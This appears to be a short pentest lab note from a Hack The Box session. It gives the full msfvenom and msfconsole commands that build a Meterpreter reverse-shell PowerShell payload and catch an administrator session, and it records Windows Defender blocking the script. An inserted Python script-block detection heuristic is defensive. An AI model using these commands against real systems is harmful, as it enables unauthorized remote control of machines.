Meterpreter reverse shell with PowerShell

1. Create shell

root@kali:~/htb# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh file: 3255 bytes
Saved as: meterpreter-64.ps1

2. Set up listener

msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.178.16; set lport 443; set ExitOnSession false; exploit -j"

3. Interact

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


=[ metasploit v4.17.25-dev ]
+ -- --=[ 1828 exploits - 1033 auxiliary - 318 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.178.16
lport => 443
ExitOnSession => false
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.178.16:443 
msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.178.10
[*] Meterpreter session 1 opened (192.168.178.16:443 -> 192.168.178.10:53418) at 2018-11-21 14:27:09 -0500

msf exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x64/windows  HTB\administrator @ PUCKIE  192.168.178.16:443 -> 192.168.178.10:53418 (192.168.178.10)

4. If Windows Defender is enabled

PS C:\PENTEST> C:\PENTEST\meterpreter-64.ps1
At C:\PENTEST\meterpreter-64.ps1:1 char:1
+ $VlSIhDyrsor = @"
+ ~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent


PS C:\PENTEST>
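What Defender does in step 4 is inspect the script text before it runs (the AMSI hook in the PowerShell parser) rather than scanning the file on disk, which is why the same .ps1 can sit untouched in C:\PENTEST yet be refused at execution. The following Python is an added example, not part of the original post and not Metasploit or Microsoft code; it shows the defender-side version of that idea as a heuristic over PowerShell script-block text, such as the content of a Microsoft-Windows-PowerShell/Operational event 4104. The indicator list, the two-signal threshold and both sample scripts are constructed assumptions: the "suspect" sample only mimics the shape of the P/Invoke declarations such a loader carries and its byte array is a placeholder counter, not a payload.

```python
"""Heuristic triage of PowerShell script-block text for in-memory loader
indicators. Added example, not part of the original post and not Metasploit
or Microsoft code; indicator set, thresholds and sample inputs are
constructed assumptions."""
import re
from dataclasses import dataclass, field

# Win32 primitives commonly declared via Add-Type/DllImport by in-memory loaders
# (assumed indicator set; legitimate P/Invoke scripts may use some of these too)
MEMORY_APIS = ("VirtualAlloc", "VirtualProtect", "CreateThread",
               "WaitForSingleObject", "memset")

# [DllImport("kernel32.dll")] with optional extra attribute arguments
DLLIMPORT_RE = re.compile(r'\[DllImport\("([\w.]+\.dll)"[^\]]*\]', re.IGNORECASE)

# A [Byte[]] literal assigned a long run of 0x.. values: an embedded code blob
BYTE_ARRAY_RE = re.compile(
    r"\[Byte\[\]\][^=]*=\s*((?:0x[0-9a-f]{2}\s*,?\s*){32,})", re.IGNORECASE)


@dataclass
class ScanResult:
    indicators: list = field(default_factory=list)
    dll_imports: list = field(default_factory=list)
    byte_array_len: int = 0

    @property
    def suspicious(self) -> bool:
        # require two independent signals so a plain P/Invoke helper is not flagged
        return len(self.indicators) >= 2


def scan_script_block(text: str) -> ScanResult:
    """Return the indicators found in one script block (e.g. one 4104 event body)."""
    result = ScanResult()
    result.dll_imports = sorted({m.group(1).lower() for m in DLLIMPORT_RE.finditer(text)})
    apis = [api for api in MEMORY_APIS if api in text]
    if "kernel32.dll" in result.dll_imports and apis:
        result.indicators.append("kernel32_memory_api:" + ",".join(apis))
    match = BYTE_ARRAY_RE.search(text)
    if match:
        result.byte_array_len = match.group(1).lower().count("0x")
        result.indicators.append(f"embedded_byte_array:{result.byte_array_len}")
    if "Add-Type" in text and '@"' in text:
        result.indicators.append("add_type_here_string")
    return result


def triage(blocks: dict) -> dict:
    """Map block id -> (suspicious flag, indicator list) for a batch of blocks."""
    return {name: (r.suspicious, r.indicators)
            for name, r in ((n, scan_script_block(t)) for n, t in blocks.items())}


# Constructed sample: shaped like the P/Invoke declarations an in-memory loader
# emits, but the byte array is a placeholder counter (0x41..0x80), not a payload.
_PLACEHOLDER_BYTES = ",".join(f"0x{b:02x}" for b in range(0x41, 0x81))
SUSPECT_BLOCK = '''$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
$w = Add-Type -MemberDefinition $code -Name "Win32" -Namespace Win32Functions -PassThru
[Byte[]];[Byte[]]$sc = ''' + _PLACEHOLDER_BYTES + "\n"

# Constructed benign sample: a P/Invoke MessageBox call, one weak signal only
BENIGN_BLOCK = '''$sig = @"
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd, string text, string caption, int options);
"@
Add-Type -MemberDefinition $sig -Name Native -Namespace Win32 -PassThru
[Win32.Native]::MessageBox(0, "Backup finished", "Scheduler", 0)
'''

if __name__ == "__main__":
    for name, (flag, hits) in triage({"suspect": SUSPECT_BLOCK,
                                      "benign": BENIGN_BLOCK}).items():
        print(f"{name}: suspicious={flag} indicators={hits}")
```

The benign block trips only the Add-Type/here-string signal and stays below the threshold, while the constructed loader shape trips all three; this is the kind of layered check that string-level obfuscation of one indicator does not defeat on its own, and it is deliberately a triage aid that complements, rather than replaces, AMSI and script-block logging.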

5. Summary: The generated ps1 can be saved to disk, is not detected as a virus, and runs successfully, creating a shell, but it can't run with Defender enabled on my Windows 10 box.

(c)2018 Jacco Straathof